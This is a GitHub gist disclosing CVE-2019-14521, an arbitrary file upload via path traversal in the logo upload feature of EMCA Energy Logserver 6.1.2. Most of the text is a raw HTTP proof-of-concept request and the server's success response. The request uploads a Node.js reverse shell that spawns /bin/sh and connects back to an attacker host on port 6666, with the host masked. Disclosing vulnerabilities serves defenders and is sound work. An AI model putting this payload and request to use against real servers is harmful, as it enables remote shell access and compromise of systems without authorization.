Skip to content

Instantly share code, notes, and snippets.

Created August 5, 2019 05:38
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
CVE-2019-14521 - Arbitrary File Upload
The Logo File upload feature in EMCA Energy Logserver 6.1.2 allows attackers to send any kind of file to any location on the server via path traversal in the filename parameter.
To exploit vulnerability, attacker has to change "filename" parameter and put malicious content into file (for example - reverse shell in node.js). Attacker can use path traversal to locate file anywhere.
Request to the server:
POST /api/admin/logoupload HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/plain, */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
kbn-version: 6.2.4
X-Csrf-Token: QSNZ7g3HUTZv1MniVh8bj4IaPQUL81Px
Content-Type: multipart/form-data; boundary=---------------------------653820859933555141363061488
Content-Length: 740
Connection: close
Cookie: sid-auth=Fe26.2**25296dc9fce823a993d01f0601a72154aa2ade42ea9004b8cc051d3961daf0a6*OpTLWQDkfk-6Fv4WTfzyCw*LM28Nb1W9gHPy4n9s5j-O4r9rNlHItji9PvhMxcBMMWz69Oi2rwKW5K21vwxAWlm4Q4n8aV9G7237zYLOb4HVA**3e5e132a726bac22877c5ea51d31c9c2d88b9eddd11e592ff0bcb13e0ddba8fd*wcNSqH9a462TDoXfH9DTugUIwoFQ7_G3lqpSCZRhJWk
Content-Disposition: form-data; name="file"; filename="rshell.js"
Content-Type: text/html
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(6666, "XXXXXXXXXXX", function(){
return /a/;
Content-Disposition: form-data; name="filename"
Response from the server:
HTTP/1.1 200 OK
kbn-name: kibana
kbn-version: 6.2.4
content-type: text/html; charset=utf-8
cache-control: no-cache
vary: accept-encoding
Connection: close
Content-Length: 21
Successfully uploaded
Maciej Domanski / team
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment